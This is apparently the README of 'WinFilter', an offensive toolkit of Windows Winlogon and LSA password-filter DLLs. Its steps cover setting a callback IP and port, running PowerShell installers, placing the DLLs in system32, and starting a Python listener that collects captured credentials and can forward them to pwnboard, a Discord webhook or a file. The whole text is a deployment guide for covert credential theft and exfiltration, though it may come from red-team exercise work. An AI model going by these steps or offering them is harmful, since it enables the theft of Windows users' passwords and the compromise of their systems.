WinFilter

Winlogon and LSA Notification Password Filters

Usage

Mingw is used to compile each dll. Install on your system before compiling, and then use make to build each dll. Binaries will exist in bin/.

Modify the IP ($ipa) and Port ($pt) that the filters will call back to in the kindtime_key.ps1 script.
Modify the name of the dll ($dllname) at the top of each filters' powershell installer scripts (lsainstall.ps1 and wlinstall.ps1). Run the installers.
Move each filter dll into C:\windows\system32.

To receive creds and set up the server, run:

python3 winfilter.py

By default, the IP will be '0.0.0.0' and the port will be '80'. You can give a specific ip or port using --ip <ip_addr> or --port <port_num>.

Screenshot Example: python3 winfilter.py --port 6006

There are three options to share creds: --pwnboard [URL], --discord [URL], --write. Any of the options can be utilized at the same time.

Name		Name	Last commit message	Last commit date
Latest commit History 40 Commits
lsanotif		lsanotif
photos		photos
shared		shared
winlogon		winlogon
.gitignore		.gitignore
Makefile		Makefile
README.md		README.md
kindtime_key.ps1		kindtime_key.ps1
winfilter.py		winfilter.py